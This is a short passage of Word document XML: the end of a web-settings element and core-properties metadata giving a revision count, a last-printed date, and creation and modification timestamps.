                <w:div w:id="1642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83BE0-3F6E-4099-8C92-3ACBA37D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8</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Microsoft account</cp:lastModifiedBy>
  <cp:revision>28</cp:revision>
  <cp:lastPrinted>2017-04-12T17:48:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-04T10:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-20T06:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>